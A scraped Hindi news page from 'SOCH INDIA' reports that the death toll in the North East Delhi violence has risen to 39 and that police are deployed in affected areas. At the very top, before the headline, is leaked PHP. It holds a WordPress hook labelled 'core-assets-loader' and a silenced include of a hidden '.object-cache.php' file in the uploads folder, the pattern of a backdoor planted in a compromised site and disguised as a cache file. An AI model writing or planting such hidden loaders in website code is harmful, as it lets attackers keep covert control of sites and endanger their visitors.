add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मृतकों की संख्या बढ़कर हुई 39, हिंसा ग्रस्त इलाकों में पुलिस तैनात – SOCH INDIA
Menu

देश
मृतकों की संख्या बढ़कर हुई 39, हिंसा ग्रस्त इलाकों में पुलिस तैनात

nobanner

हिंसा ग्रस्त उत्तर पूर्वी दिल्ली (North East Delhi) में हालात तेजी से सामान्य हो रहे हैं. गृह मंत्रालय (Home Ministry) ने कहा है कि पिछले 36 घंटों में हिंसा ग्रस्त पुलिस थानों में कोई बड़ी घटना दर्ज नहीं हुई है. इस बीच मृतकों की संख्या 39 हो गई है.

दिल्ली पुलिस के ज्वाइंट कमिश्नर ओ.पी. मिश्रा  चांद बाग में हालात सामान्य कराने के लिए इलाके का दौरा किया. चांद बाग में दिल्ली पुलिस के ज्वांइट कमीश्नर ओ.पी. मिश्रा ने कहा, ‘इलाके में हालात सामान्य होने की प्रक्रिया कल से शुरू हो गई थी.हमारा फोकस यहां रहने वाले लोगों का सामान्य जन जीवन शुरू हो सुनिश्चित करना है.फ्लैग मार्च, पेट्रोलिंग के जरिए हम लोगों को विश्वास में लेने की कोशिश कर रहे हैं.’

हिंसा प्रभावित मौजपुर में भी सुरक्षा बल तैनात हैं. सुरक्षा बल इलाके में लोगों से बात करके और अपनी उपस्थिति दर्ज कराकर हालात सामान्य कराने की कोशिश कर रहे हैं।